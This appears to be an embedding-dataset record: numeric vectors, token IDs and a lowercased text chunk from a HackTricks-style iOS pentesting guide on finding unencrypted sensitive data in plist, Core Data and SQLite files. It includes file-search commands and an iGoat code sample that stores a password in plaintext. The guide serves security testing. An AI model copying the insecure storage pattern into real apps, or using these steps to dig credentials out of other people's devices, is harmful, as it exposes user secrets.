[ 0.34073224663734436, -0.38227999210357666, 0.08116601407527924, 0.20592911541461945, 0.30218714475631714, -0.02555115707218647, 0.22683365643024445, 0.42890504002571106, 0.6519411206245422, 0.6694401502609253, -0.004647752270102501, -0.3314685523509979, 0.04694494977593422, -0.4260179102420807, -0.23628492653369904, -0.33746537566185, -0.39532241225242615, 0.27584144473075867, -0.6242612600326538, -0.49717748165130615, -0.15088506042957306, 0.42143693566322327, -0.5253925919532776, -0.5474972724914551, -0.6415735483169556, 0.8505484461784363, -0.018089672550559044, 0.38722825050354004, 0.7171419858932495, 0.5081510543823242, -0.21670714020729065, 0.6128148436546326, -0.15711569786071777, -0.5425397157669067, 0.23213797807693481, -0.40499264001846313, 1.0548187494277954, -0.5943256616592407, 0.2030036896467209, -1.011893391609192, 0.5153952240943909, 0.27546072006225586, 0.07593683898448944, -0.8374674320220947, -0.3541214168071747, -0.6753338575363159, -0.3833269476890564, -0.15686607360839844, 0.4831956624984741, -0.35390010476112366, 0.7111687064170837, 0.3755921423435211, -0.22941268980503082, -0.2175484448671341, 0.26601120829582214, -0.3194630444049835, 0.23177336156368256, 0.10452119261026382, -0.2434353530406952, 0.5133448839187622, -0.47447100281715393, 0.2968112826347351, 0.03172552213072777, -0.6349946856498718, -0.007508838549256325, 0.2422538548707962, -0.2105754166841507, -0.45876309275627136, -0.24246931076049805, -0.25991207361221313, -0.2860496938228607, 0.9438189268112183, -0.5828030109405518, -0.822969377040863, -0.13161854445934296, 0.13845202326774597, -0.03613603860139847, 0.04256351292133331, 0.24099871516227722, 0.19175946712493896, 0.39188697934150696, 0.5063763856887817, 0.01390436477959156, 0.219233900308609, -0.5128863453865051, -0.27121713757514954, 0.42591580748558044, -0.18799611926078796, -0.5845330357551575, -0.1941123753786087, 0.3522976338863373, 0.340484619140625, -0.9880152344703674, -0.2765754461288452, 0.7772667407989502, 0.521420955657959, -0.22681453824043274, -0.2389892041683197, -0.27848905324935913, -0.5392380356788635, 0.43271711468696594, 1.0687016248703003, 0.35592272877693176, 0.7055698037147522, -0.32370302081108093, 0.3840712904930115, 0.7026854753494263, -0.1582643836736679, -0.6298617720603943, -0.48134124279022217, -0.04134957492351532, 0.11302100121974945, 0.39331597089767456, -0.4885980784893036, 0.4038570523262024, 0.5455133318901062, 0.9153423309326172, 0.36711588501930237, -0.19997434318065643, -0.13657811284065247, 0.7100879549980164, -0.22510045766830444, 0.2335856705904007, -0.7335090041160583, -0.17215077579021454, 0.4516119658946991, 0.47089606523513794, 0.6920718550682068, -0.35950806736946106, -0.4619296193122864, -0.14692096412181854, -0.5278391242027283, 0.2996232211589813, 0.8358495831489563, -0.44935452938079834, 0.35714903473854065, -0.22323225438594818, 0.559807300567627, 0.3959459364414215, -0.889784038066864, 0.18445587158203125, 0.4968033730983734, 0.4481208324432373, 0.8822277784347534, 0.271970272064209, 0.1517556756734848, -0.7025548815727234, -0.8080114126205444, -0.04789160192012787, 0.36439621448516846, -0.26896631717681885, 1.0703980922698975, 1.1031595468521118, -0.4069790244102478, 0.23753347992897034, -0.20470693707466125, -1.108795166015625, 0.4404588043689728, -0.26281222701072693, 0.10122067481279373, -0.5588107109069824, 0.6844408512115479, 0.20233146846294403, 0.016552826389670372, 0.03934413194656372, 0.013038067147135735, -0.7136767506599426, -0.043235041201114655, 0.2644321322441101, -0.10600199550390244, -0.03969576954841614, 0.07644480466842651, 0.33340293169021606, 0.4912987947463989, 1.1016359329223633, 0.5649210810661316, 0.6439341306686401, 0.3475353717803955, -0.26038604974746704, 0.3159696161746979, 0.045192744582891464, 0.0604591928422451, 0.37571004033088684, 0.20165380835533142, -0.22607877850532532, 0.245382621884346, -0.9222813248634338, -1.0502780675888062, -0.41731497645378113, -0.49519479274749756, -0.89652019739151, 0.9943932890892029, -0.5050751566886902, 0.2305159568786621, 0.2422591894865036, -0.14181649684906006, -1.1626712083816528, -0.7353572249412537, -0.3550877869129181, -1.5488663911819458, -0.833915114402771, -0.28388479351997375, 0.3442719578742981, 0.16766877472400665, -0.31552430987358093, -0.0953177660703659, 0.7192264199256897, 0.052437055855989456, 0.3354364335536957, 0.46612924337387085, 1.266491174697876, -0.45282748341560364, -0.9830288290977478, -0.4868330955505371, -0.1333802193403244, -0.2120259702205658, 0.2248838096857071, 0.15522430837154388, -0.330512136220932, -0.2063801884651184, -0.14492957293987274, 0.2299855798482895, 0.767480731010437, 0.03539378196001053, -0.5828902721405029, 0.024277338758111, 0.16384540498256683, 0.38187745213508606, -0.48232266306877136, 0.10837376862764359, -0.4264322519302368, 1.2532507181167603, 0.46761512756347656, 0.6587874293327332, 0.26783475279808044, 0.35476556420326233, 0.026359766721725464, 0.1489693820476532, 0.18663914501667023, 0.3079238533973694, 0.43617936968803406, 0.6572427749633789, 0.022036222741007805, 0.3608185350894928, 0.803544282913208, 0.19322477281093597, 0.11205150932073593, 0.2576884329319, 0.2878992259502411, 1.0500414371490479, -0.5043900609016418, 0.865215003490448, 0.9648227691650391, -0.32320722937583923, -1.0742954015731812, -0.8504109382629395, 0.8241786956787109, 0.7507082223892212, -0.21565024554729462, -0.7529197335243225, -0.41276222467422485, 0.24247516691684723, 0.4287613332271576, 0.3874318301677704, -0.08175118267536163, 0.6862745881080627, 0.44216489791870117, 1.0899443626403809, -0.32548844814300537, -0.442259281873703, -0.6559542417526245, -0.17367900907993317, -1.0592862367630005, 0.003536716103553772, -0.5930742621421814, 0.1725309193134308, 0.11755426228046417, -0.7753134965896606, 0.12431719899177551, -0.5421027541160583, -0.6020910143852234, -0.0848769098520279, 0.9954796433448792, 0.14082399010658264, -0.30678868293762207, 0.12551282346248627, -1.045201301574707, 0.46548905968666077, 0.06020669266581535, 0.6842387318611145, -0.2967025637626648, 0.2750532925128937, -0.7584348320960999, -0.5608423352241516, 0.2371792495250702, -0.8748157024383545, 0.8976789712905884, -0.10994558036327362, 0.09305926412343979, -0.288790225982666, 0.19235624372959137, 0.24970455467700958, -0.08907453715801239, 0.40921640396118164, -0.6960563659667969, 0.8656591773033142, 0.3290325105190277, 0.48705530166625977, 0.18870599567890167, 0.5381518602371216, -0.45607876777648926, 0.01144310925155878, 0.3719000518321991, 0.7930227518081665, -0.6434257626533508, 0.4126194417476654, 0.8086865544319153, 0.29822060465812683, 0.23422962427139282, -0.2313140630722046, -0.021604960784316063, -0.7987982034683228, -0.058599941432476044, -0.1623390167951584, 0.13592834770679474, 0.2019750326871872, -0.12102846056222916, -1.0738465785980225, 0.6982889175415039, -0.7353571057319641, -0.3992491662502289, 0.07308140397071838, 0.3575252890586853, 0.9894082546234131, -0.05805625766515732, 0.4195809066295624, 0.34615474939346313, -0.7988775372505188, 0.18499508500099182, 0.6337237358093262, 0.12462835758924484, -0.5743227005004883, 0.07765554636716843, -0.2536601424217224, -0.5821496844291687, 0.299539715051651, 0.3892281949520111, -0.16798435151576996, -0.19698338210582733, -0.7243894934654236, -0.5373545289039612, -0.1937524378299713, 0.32772180438041687, 0.04348600283265114, 0.3737154006958008, 0.5667883157730103, -0.16896584630012512, -0.252194344997406, 0.1935652196407318, 0.37366390228271484, 0.4773792326450348, 0.5593520998954773, 0.31986311078071594, 0.3254215121269226, -0.18718750774860382, -0.2812340259552002, -0.0883118212223053, -0.01694045029580593, 0.6089102029800415, -0.08573800325393677, 0.869742214679718, 0.03968950733542442, 0.5169591307640076, 0.7550865411758423, -0.44678670167922974, -1.0847182273864746, 0.675500214099884, -0.4360995292663574, 0.5310341119766235, -0.3557310104370117, 0.3361116051673889, -0.09577931463718414, 0.05448143556714058, 0.4047250747680664, 0.3702392280101776, 0.24364545941352844, -0.6205797791481018, -0.2948293089866638, 0.07218179851770401, -0.31913116574287415, 0.15176309645175934, -0.08237987011671066, -0.40279555320739746, 0.30670586228370667, -0.6629244089126587, -0.792698085308075, 0.16721607744693756, 0.798140823841095, 0.5660750865936279, -0.033647239208221436, 0.825673520565033, 0.4419822692871094, -0.8022858500480652, -0.2954256534576416, -0.5012402534484863, 0.2343657910823822, 0.35171955823898315, 0.7313110828399658, 0.046140167862176895, 0.06282131373882294, -0.31434154510498047, 0.03640877082943916, -0.7384456992149353, 0.2627454996109009, -0.0688076838850975, -0.10857284069061279, -0.8699488639831543, -0.5624702572822571, -0.6950145959854126, -0.33141446113586426, -0.7055991291999817, -0.33589115738868713, -0.2880517840385437, 0.5968440175056458, 0.9587510228157043, -0.14526234567165375, 0.34171798825263977, -0.035398103296756744, -0.19418397545814514, 0.019854102283716202, 0.13806147873401642, -0.6152834296226501, -0.5071925520896912, 0.10156098753213882, -0.7314451932907104, 0.3074340224266052, 0.407291054725647, 0.2186916619539261, 0.34394821524620056, -1.1184898614883423, 0.1728745698928833, 0.7194417715072632, -0.5819831490516663, -0.04587607458233833, 0.2080496996641159, 0.18855905532836914, 0.5179756283760071, 0.2961678206920624, 0.17389191687107086, -0.23581264913082123, 0.21148835122585297, -0.4992765486240387, 0.8239437937736511, -0.6686456203460693, 0.005683829076588154, 1.094071626663208, 0.3143446743488312, -0.7244158387184143, 0.1383092999458313, -0.8572925329208374, 0.4726564884185791, 0.4327827990055084, 0.26532095670700073, -0.08982233703136444, -0.036518823355436325, 0.7566099166870117, -0.3011980652809143, -0.5330145359039307, 0.057330913841724396, 0.5107356309890747, 0.13922031223773956, 0.4063228368759155, -0.10177485644817352, -0.7861678600311279, 0.7778763175010681, -0.7522323131561279, 0.9075303673744202, -0.6096675395965576, 0.22958135604858398, 0.30469080805778503, -0.0801689624786377, 1.2201776504516602, 0.4719984531402588, -0.017927082255482674, -1.231622576713562, -0.4417625367641449, -0.2577979862689972, -0.22608286142349243, 0.4434204697608948, 1.0347802639007568, 0.363545686006546, -0.4456062614917755, -0.4302534759044647, 0.3996971547603607, -0.3672529458999634, -0.6532270312309265, -0.867408275604248, -0.3404270112514496, 0.10870814323425293, -0.1062861755490303, 0.495108425617218, -0.27697911858558655, -0.4846837520599365, 0.8337652683258057, 0.07982544600963593, -0.20171283185482025, -0.9997156262397766, -0.3200157582759857, -0.3108969032764435, -0.16365869343280792, -0.1120615303516388, -0.03154590725898743, 0.08240500837564468, -0.2279844433069229, 0.060658253729343414, 0.1604202538728714, 0.5757903456687927, -0.1379900723695755, -0.5600408315658569, 0.44917014241218567, 0.5218759179115295, 0.019284702837467194, -0.18648026883602142, 0.3899379372596741, -0.08994836360216141, -0.14332939684391022, -0.3831257224082947, -0.3404141664505005, -0.5179884433746338, -0.29145658016204834, 0.0354422889649868, -0.12817564606666565, 0.6704215407371521, -0.6366742849349976, -0.5388686656951904, -0.10814348608255386, 0.9320080876350403, -0.01513973530381918, -1.0470151901245117, 0.4043210744857788, 0.1264813393354416, 0.4423651695251465, -0.35474011301994324, -0.34990209341049194, -0.7131102681159973, -0.4633767306804657, -0.27623242139816284, 0.6693203449249268, -0.358684778213501, 0.20455357432365417, -0.16257041692733765, -0.40895286202430725, 0.3904704451560974, 0.7915429472923279, -0.7301375269889832, -0.23784159123897552, -0.483381450176239, 0.26238003373146057, -0.23434706032276154, 0.5450217723846436, -0.7728747725486755, 0.2541894018650055, -0.328721284866333, -0.38434621691703796, 0.34076932072639465, 0.004682143684476614, -0.5727857351303101, 0.5905978083610535, 0.95598965883255, -0.8521087169647217, -0.0032701012678444386, -0.5889238715171814, 1.1688252687454224, 0.23651328682899475, -0.3401252031326294, -1.106262445449829, 0.6907299160957336, -0.6595369577407837, -0.7722893357276917, 0.49347010254859924, -0.37564605474472046, -0.19923675060272217, 0.28952911496162415, -0.2683420181274414, 0.4705563187599182, -0.5745949745178223, 0.5973882079124451, 0.9495892524719238, -0.5210073590278625, -0.30960699915885925, -0.649391233921051, 0.7549765706062317, 0.9423772096633911, -0.4514442980289459, 0.27566778659820557, -0.05219251289963722, -0.6563453078269958, -0.5004134178161621, -0.2788805067539215, -0.42449718713760376, -0.6832786202430725, 0.11055322736501694, 0.47267651557922363, 0.13141661882400513, 0.5949518084526062, 0.20339176058769226, -0.5119536519050598, -0.013991971500217915, 0.03021487407386303, -0.6323689222335815, 0.7793567776679993, 0.9370545148849487, 0.16763809323310852, -0.05132194608449936, 0.025506949052214622, 0.0043317717500030994, -0.0284982118755579, -0.22562260925769806, 0.8289024233818054, 0.38814571499824524, -0.4696548581123352, 0.25834834575653076, 0.13539725542068481, -0.8778932690620422, -0.23311181366443634, 0.4727235734462738, -0.22232763469219208, 0.28838637471199036, -0.3950616121292114, 0.1264358013868332, 0.2581295073032379, -0.5978021621704102, 0.14777342975139618, 0.31107765436172485, -0.24716992676258087, 0.08499826490879059, -0.626068651676178, 0.28054580092430115, 0.49878600239753723, -0.18079471588134766, 0.4571441411972046, -0.6443823575973511, -0.5248734354972839, -0.417934387922287, -0.0027582289185374975, -0.15638265013694763, -0.34479978680610657, 1.2262455224990845, -0.8614817261695862, -0.053542643785476685, -0.5782114267349243, -0.18634621798992157, 0.6883702874183655, 0.2833060622215271, 0.22679130733013153, 0.34108152985572815, 0.16758993268013, -0.3862469792366028, -0.06972472369670868, 0.7325275540351868, -0.10816251486539841, -0.14180274307727814, -0.6384869813919067, -0.08204134553670883, -0.031513117253780365, 0.24938595294952393, -0.22038684785366058, -0.8829144835472107, -0.3620312511920929, -0.401477575302124, -0.42580491304397583, 0.45096561312675476, -0.8111063838005066, -0.3616255223751068, 0.17408350110054016, 0.11110374331474304, -0.43557852506637573, -0.04065960645675659, 0.5062090158462524, -0.877659261226654, 0.48829472064971924, -0.7362027764320374, 0.7608761787414551, -0.7176343202590942, -0.26541662216186523, -0.5561598539352417, -0.7417912483215332, -0.5175573229789734, -0.6358147859573364, -0.4623188376426697, -0.16728366911411285, -1.0097280740737915, 0.6288157105445862, -0.5858308672904968, 0.2140444666147232, -0.08321771025657654, -0.6508281230926514, -0.19777710735797882, 0.6116687655448914, -0.4303726851940155, 0.08207481354475021, 0.30929672718048096, 0.3959870934486389, 0.4214698374271393, -0.21185551583766937, 0.04071611911058426, -0.34189319610595703, 0.13700462877750397, -0.19992756843566895, 0.18173335492610931, -0.13042278587818146, 0.2268567681312561, 0.4129667580127716, -0.784320056438446, -0.5166569352149963, -0.3788968324661255, -0.09433464705944061, 0.8098676204681396, 0.07907382398843765, -0.00009608184336684644, 0.08542388677597046, 0.5273790955543518, 0.2885110080242157, -0.7308599352836609, 0.12351623922586441, 0.7420180439949036, 0.02190595678985119, -0.08905939757823944, 0.08474929630756378, -0.22723209857940674, -0.3631344437599182, 0.07950698584318161, 0.5106039047241211, -0.5334646105766296, 0.02381676249206066, -0.18059271574020386, 0.23840060830116272, -0.4055948853492737, -0.16208510100841522, 0.07584913820028305, 0.20406897366046906, 0.5587952136993408, 0.4511571228504181, 0.009551326744258404, 0.42805370688438416, -1.1401207447052002, 0.08736750483512878, -0.455866277217865, -0.4948943555355072, 0.25326648354530334, -0.10735709965229034, -1.2184772491455078, -0.49837103486061096, 0.2490120530128479, 0.4137774705886841, 0.07403618097305298, 0.31958505511283875, -0.31863993406295776, -0.08649053424596786, -0.14035646617412567, 0.7503979802131653, 0.03549996018409729, -0.32783353328704834, -0.4692574739456177, 0.2109144628047943, -0.6322727203369141, -0.43933263421058655, 0.5149314999580383, 1.022835373878479, -0.29506775736808777, -0.6091421842575073, -0.13286882638931274, -0.20484721660614014, 0.958376407623291, -0.1671486645936966, 0.44631436467170715, 0.06847357004880905, -0.4773227870464325, 0.7503403425216675, -0.6103761792182922, 0.3493702709674835, -0.035092297941446304, 0.36574000120162964, 0.1268918216228485, -0.39296138286590576, -0.16095101833343506, -0.032767798751592636, 0.2970220148563385, -0.3637351989746094, 0.22614634037017822, 0.5967354774475098, 0.33929553627967834, -0.671459436416626, 0.20032361149787903, -0.1996113806962967, 0.1253608614206314, 0.483055055141449, 0.24737079441547394, -0.050510138273239136, 0.6743064522743225, 0.3589867353439331, -0.20839889347553253, -0.10139559954404831, 0.6098483800888062, -0.10895362496376038, -0.04945206642150879, -0.04449594020843506, -0.04272947460412979, -0.39130547642707825, 0.4081490635871887, -0.10569681227207184, -0.2146163433790207, -0.2822481393814087, -0.0006645915564149618, -0.4210006594657898, -0.33298343420028687, 1.1918988227844238, -0.9331852793693542, 0.6011794805526733, 0.015298961661756039, 0.009585777297616005, 0.25967732071876526, -0.24562379717826843, -0.8413909673690796, 0.5445994138717651, 0.7661157846450806, 0.3677824139595032, 0.09692301601171494, 0.9498388171195984, -0.3380959630012512, -0.16095124185085297, 0.20479334890842438, -0.05096837878227234, -1.1583354473114014, 0.19568875432014465, 0.08990979194641113, -0.9000570774078369, -0.658464789390564, -0.2863589823246002, 0.0811237096786499, -0.846238911151886, 0.4412365257740021, -0.47184568643569946, 0.3415524661540985, -0.7943258881568909, 0.24143998324871063, -0.35100916028022766, 0.15644918382167816, 0.5369844436645508, -0.40690433979034424, -0.8393800258636475, 1.0709549188613892, -0.15257973968982697, 0.7706348896026611, -0.1047721803188324, 0.23422086238861084, 0.5817064642906189, 0.5871238112449646, 0.20861253142356873, -0.9624814987182617, 0.07735235244035721, -0.040449246764183044, 0.2097208946943283, -0.557732105255127, -0.5025773644447327, -0.1999356597661972, 0.40795624256134033, -0.17869766056537628, -0.08494315296411514, -0.2746945023536682, 0.07051635533571243, -0.4352293908596039, -0.9555454850196838, 0.140076145529747, 0.3385585844516754, -0.24424973130226135, 0.10956014692783356, -0.13088281452655792, -0.062417853623628616, 0.5166946649551392, -0.7280175089836121, -0.11465489864349365, 0.22220081090927124, -0.17334696650505066, 0.4211166799068451, 0.9511028528213501, -0.09374798089265823, -0.3719262480735779, 0.5001792907714844, -0.9958999752998352, -0.054379142820835114, 0.15515923500061035, -0.2652999758720398, -0.45774948596954346, 0.4907422661781311, -0.2079087346792221, 1.018676996231079, 0.5964734554290771, -0.7392357587814331, 0.031140489503741264, 0.22450020909309387, 0.5071995258331299, -0.5753939747810364, 1.2955929040908813, 0.6031215786933899, 0.08681757748126984, 0.6412032842636108, -0.40515953302383423, 0.8997078537940979, -0.46371638774871826, -0.5583705902099609, -0.15150710940361023, -0.675794243812561, -1.0181103944778442, -0.5194564461708069, -0.2898333668708801, 0.22539520263671875, -0.20107834041118622, 0.5429088473320007, -0.46664512157440186, 0.08346027135848999, -0.6673831343650818, 0.6350370049476624, -0.2928926348686218, -0.5150098204612732, 0.4364876449108124, -0.019801249727606773, 0.15614469349384308, -1.3914291858673096, 4.264595031738281, 0.8681257963180542, 0.370601624250412, -0.020283211022615433, 0.35076332092285156, 0.3296576142311096, 1.1873574256896973, -0.9330785870552063, 0.5356460809707642, -0.676506519317627, 0.10011415183544159, -0.8631725907325745, 0.418535053730011, 0.2383480817079544, 0.14148086309432983, 0.5309231877326965, -0.5468505024909973, 0.1512046754360199, 0.5547183156013489, -0.7427991032600403, -0.5211424827575684, -0.11348830908536911, -0.14417076110839844, 0.8589548468589783, 0.057086169719696045, 0.04488838464021683, 0.32601818442344666, -0.7356982827186584, -0.38107508420944214, -0.07423512637615204, 0.05048021301627159, -0.7557752728462219, 0.8374936580657959, -0.4693326950073242, -0.050224773585796356, 0.7625939846038818, 0.26540496945381165, -0.6772192120552063, -0.44614169001579285, 0.9438390731811523, -0.3533574342727661, -0.3117223381996155, 0.12743303179740906, -0.07110799849033356, 0.14677365124225616, 0.9632476568222046, -0.43291735649108887, 0.49638113379478455, 0.8300373554229736, -0.9064982533454895, 0.6835035681724548, -0.32818859815597534, 0.33476704359054565, -0.07369107753038406, -1.2833939790725708, 0.21347928047180176, -0.517946720123291, -0.3927389979362488, -0.33312827348709106, 0.203121155500412, 0.3793031871318817, -0.5965845584869385, -0.4422462284564972, 0.04692298173904419, -0.845719039440155, 0.5606184601783752, -0.32570528984069824, 1.3003404140472412, 0.05435222387313843, -0.5705485343933105, -0.14883045852184296, -0.12844553589820862, -0.6260802149772644, -0.5351598262786865, 0.6879538297653198, -0.2952291667461395, -0.34016892313957214, 0.3202453553676605, 0.16634370386600494, -0.9529956579208374, -0.022484613582491875, -0.3492913246154785, -0.6016321778297424, -0.05803669989109039, 1.229619026184082, 0.5694003105163574, -0.208084836602211, -0.7754457592964172, 0.34273990988731384, -0.05147865414619446, 0.2703031301498413, 0.3748782277107239, -0.18528303503990173, -0.14446485042572021, -0.031957462430000305 ]
[ 2055, 2129, 16380, 5324, 2951, 1999, 1996, 5080, 3191, 2023, 3931, 1024, 16380, 24078, 10760, 2206, 3182, 2000, 3573, 2592, 2323, 2022, 7039, 2157, 2044, 23658, 1996, 4646, 1010, 2044, 9361, 2035, 1996, 8360, 6447, 1997, 1996, 4646, 1998, 2130, 2044, 8833, 2378, 2041, 2013, 2028, 5310, 1998, 8833, 2378, 2046, 1037, 2367, 2028, 1012, 1996, 3125, 2003, 2000, 2424, 4895, 21572, 26557, 3064, 7591, 2592, 1997, 1996, 4646, 1006, 20786, 2015, 1010, 19204, 2015, 1007, 1010, 1997, 1996, 2783, 5310, 1998, 1997, 3130, 26618, 5198, 1012, 20228, 2923, 24759, 2923, 6764, 2024, 14336, 20950, 6764, 2008, 3397, 3145, 1011, 3643, 7689, 1012, 2009, 1005, 1055, 1037, 2126, 2000, 3573, 14516, 2951, 1010, 2061, 2823, 2017, 2089, 2424, 7591, 2592, 1999, 2122, 6764, 1012, 2009, 1005, 1055, 6749, 2000, 4638, 2122, 6764, 2044, 23658, 1996, 10439, 1998, 2044, 2478, 11806, 2135, 2009, 2000, 2156, 2065, 2047, 2951, 2003, 2517, 1012, 1996, 2087, 2691, 2126, 2000, 29486, 2951, 1999, 20228, 2923, 6764, 2003, 2083, 1996, 8192, 1997, 24978, 20330, 3207, 7011, 11314, 2015, 1012, 2023, 20228, 2923, 5371, 2003, 5552, 2503, 1996, 10439, 5472, 8758, 1999, 3075, 1013, 18394, 1013, 1026, 10439, 27265, 23057, 2094, 1028, 1012, 20228, 2923, 10760, 24978, 20330, 3207, 7011, 11314, 2015, 2465, 3640, 1037, 2565, 12644, 8278, 2005, 21935, 2007, 1996, 12398, 2291, 1012, 1996, 12398, 2291, 4473, 2019, 4646, 2000, 7661, 4697, 2049, 9164, 2429, 2000, 5310, 18394, 1012, 2951, 5552, 2011, 24978, 20330, 3207, 7011, 11314, 2015, 2064, 2022, 7021, 1999, 1996, 4646, 14012, 1012, 2023, 2465, 5324, 2951, 1999, 1037, 20228, 2923, 5371, 1010, 2021, 2009, 1005, 1055, 3214, 2000, 2022, 2109, 2007, 2235, 8310, 1997, 2951, 1012, 2023, 2951, 3685, 2022, 2936, 11570, 3495, 3081, 1037, 9480, 3274, 1010, 2021, 2064, 2022, 11570, 4488, 1037, 10200, 1012, 2017, 2064, 15653, 1996, 2592, 5552, 2478, 24978, 20330, 3207, 7011, 11314, 2015, 2478, 22224, 1005, 1055, 16380, 24978, 20330, 3207, 7011, 11314, 2015, 2131, 3406, 2424, 2035, 1996, 20228, 2923, 1997, 2109, 2011, 1996, 4646, 2017, 2064, 3229, 2000, 1013, 2797, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 1063, 10439, 3593, 1065, 1998, 2448, 1024, 2424, 1012, 1013, 1011, 2171, 1000, 1008, 1012, 20228, 2923, 1000, 1996, 5371, 2453, 2022, 4289, 3064, 1999, 20950, 2030, 12441, 1006, 17531, 9863, 1007, 1012, 2017, 2064, 10463, 2009, 2000, 20950, 4289, 2007, 2028, 3722, 3094, 1024, 2006, 6097, 2891, 2007, 20228, 21823, 2140, 1010, 2029, 2003, 1037, 6994, 2008, 3310, 3128, 2135, 2007, 6097, 2891, 2184, 1012, 1016, 1998, 2682, 4617, 1006, 2053, 2880, 3784, 12653, 2003, 2747, 2800, 1007, 1024, 1002, 20228, 21823, 2140, 1011, 10463, 20950, 2487, 18558, 1012, 20228, 20483, 2078, 11603, 1024, 1002, 26794, 16500, 5622, 2497, 24759, 2923, 1011, 21183, 12146, 1002, 20228, 2923, 21823, 2140, 1011, 1045, 18558, 1012, 20228, 2923, 1011, 1051, 18558, 1035, 20950, 1012, 20228, 20483, 2078, 2019, 22224, 1005, 1055, 5219, 1024, 16380, 20228, 2923, 4937, 1013, 2797, 1013, 13075, 1013, 4684, 1013, 16143, 1013, 2951, 1013, 4646, 1013, 21358, 2487, 2546, 22275, 2549, 2497, 1011, 26314, 2620, 2546, 1011, 5511, 17788, 1011, 9353, 2497 ]
hack_tricks
43.txt
8
##21 - c0301ab7e56d / library / preferences / com. some. package. app. plistcore datacore data is a framework for managing the model layer of objects in your application. core data can use sqlite as its persistent store, but the framework itself is not a database. coredata does not encrypt it's data by default. however, an additional encryption layer can be added to coredata. see the github repo for more details. you can find the sqlite core data information of an application in the path / private / var / mobile / containers / data / application / { appid } / library / application supportif you can open the sqlite and access sensitive information, then you found a miss - configuration. code from igoat - ( void ) storedetails { appdelegate * appdelegate = ( appdelegate * ) ( uiapplication. sharedapplication. delegate ) ; nsmanagedobjectcontext * context = [ appdelegate managedobjectcontext ] ; user * user = [ self fetchuser ] ; if ( user ) { return ; } user = [ nsentitydescription insertnewobjectforentityforname : @ " user " inmanagedobjectcontext : context ] ; user. email = coredataemail ; user. password = coredatapassword ; nserror * error ; if (! [ context save : & error ] ) { nslog ( @ " error in saving data : % @ ", [ error localizeddescription ] ) ; } else { nslog ( @ " data stored in core data " ) ; } } yapdatabaseyapdatabase is a key / value store built on top of sqlite. as the yap databases are sqlite databases you can find them using the purposed commend in the previous section. other sqlite databasesit's common for applications to create their own sqlite database. they may be storing sensitive data on them and leaving it unencrypted. therefore, it's always interesting to check every database inside the applications directory. therefore go to the application directory where the data is saved ( / private / var / mobile / containers / data / application / { appid } ) find. / - name " *. sqlite " - or - name " *. db " firebase real - time
[ -0.03616468608379364, -0.46578019857406616, -0.09068723767995834, 0.3785226047039032, -0.26012805104255676, 0.31571316719055176, 0.3337470293045044, 0.39725252985954285, 0.22802597284317017, 0.875630259513855, 0.16488017141819, 0.0515737310051918, 0.1470825970172882, -0.4687950611114502, -0.3537459969520569, -0.40299496054649353, -0.6818727850914001, 0.4635569155216217, -0.9352365136146545, -0.15981049835681915, 0.4269717335700989, 0.2826436460018158, -0.766884446144104, -0.9913491606712341, -0.5148351192474365, 0.9055811762809753, 0.3062901198863983, 0.13970643281936646, 0.15649005770683289, 1.0752065181732178, -0.2801319658756256, -0.2809498608112335, 0.24389728903770447, -0.2421591430902481, -0.3741475045681, 0.06712853163480759, 0.7606624960899353, -0.02942945808172226, -0.13060647249221802, -0.7892005443572998, 0.27787449955940247, -0.189589723944664, 0.3976222276687622, -0.18765932321548462, -0.7964415550231934, -0.34052443504333496, 0.08384839445352554, -0.05437362194061279, 0.2546211779117584, -0.2726289629936218, 0.5617771148681641, 0.3182092308998108, 0.22287790477275848, 0.23339201509952545, 0.7229263782501221, 0.0009182326029986143, 0.8197413682937622, 0.1095365434885025, -0.5517328977584839, 0.535544216632843, 0.11755822598934174, -0.013563089072704315, -0.14388805627822876, -0.6967757344245911, 0.37258097529411316, -0.5402107238769531, -0.7511755228042603, -0.3551022708415985, -0.20226608216762543, -0.5447512865066528, -0.004781968425959349, 0.8219623565673828, 0.02363794669508934, -0.8923696279525757, -0.4152783751487732, 0.08245744556188583, -0.25374674797058105, -0.6239424347877502, -0.28344282507896423, 0.5624225735664368, -0.15152259171009064, 0.49214738607406616, 0.7139346599578857, -0.1864822953939438, -0.17818984389305115, -0.29547086358070374, 0.12707407772541046, 0.5886049866676331, -0.23190276324748993, 0.3295736610889435, 0.15387777984142303, 0.45792698860168457, -0.7901031970977783, 0.2169104665517807, 0.06022084876894951, 0.7615519165992737, -0.30665120482444763, -0.1770201176404953, 0.10576214641332626, -0.05818547308444977, 0.9318345189094543, 0.8103308081626892, 0.5657668709754944, 0.936029851436615, -0.47684505581855774, 0.6012629270553589, 0.21361134946346283, -0.09490670263767242, -0.0815567895770073, 0.11615307629108429, 0.10372494906187057, -0.25382816791534424, 0.7208571434020996, -0.9637078046798706, -0.03609634190797806, 0.28135859966278076, 0.6074102520942688, 0.20942455530166626, -0.31786561012268066, 0.37043485045433044, 0.23418428003787994, -0.5012596249580383, 0.590039849281311, -0.49233439564704895, 0.06560195982456207, -0.18087878823280334, 1.060680627822876, 0.4610670506954193, -0.4981761872768402, -0.5594347715377808, -0.26441553235054016, -0.762474000453949, -0.08782510459423065, 0.7042444348335266, -0.9657627940177917, 0.3104409873485565, 0.12472732365131378, 0.5900657773017883, 0.4318937361240387, -0.6605638861656189, 0.11189581453800201, 0.6165776252746582, 0.34442204236984253, 0.5545706748962402, 0.6187268495559692, -0.293781042098999, -0.45353564620018005, -0.5415164828300476, -0.32030001282691956, 0.6886665225028992, -0.11598005890846252, 0.562837541103363, 1.0686779022216797, -0.10805480927228928, -0.39181679487228394, -0.16302306950092316, -0.7973632216453552, 0.6025645136833191, -0.4883689284324646, -0.2019105702638626, -0.16604101657867432, 0.3953626751899719, 0.12824489176273346, 0.15356896817684174, -0.6349537968635559, 0.5506537556648254, -0.7447824478149414, -0.3378453850746155, -0.49906378984451294, 0.4638665020465851, 0.36070480942726135, 0.07206553965806961, -0.29585909843444824, 0.4790109694004059, 0.922484278678894, 1.1716233491897583, -0.15004639327526093, 0.19141869246959686, 0.7754203677177429, 0.2995801270008087, -0.17344728112220764, 0.2639838755130768, 0.18331745266914368, 0.5766226649284363, -0.12504713237285614, 0.22723007202148438, -0.5129078030586243, -0.70359867811203, -0.31242284178733826, -0.2793813943862915, -0.7127014994621277, 0.4305829405784607, -0.7630404233932495, 0.5108368396759033, 0.1870248019695282, -0.7055578827857971, -1.4249348640441895, -0.25681960582733154, -0.19669832289218903, -1.4912394285202026, -0.3474878668785095, -0.32455936074256897, -0.15534168481826782, 0.37910449504852295, -0.44301143288612366, -0.10892169922590256, 0.6356624364852905, 0.4533357322216034, -0.28103283047676086, 1.023011565208435, 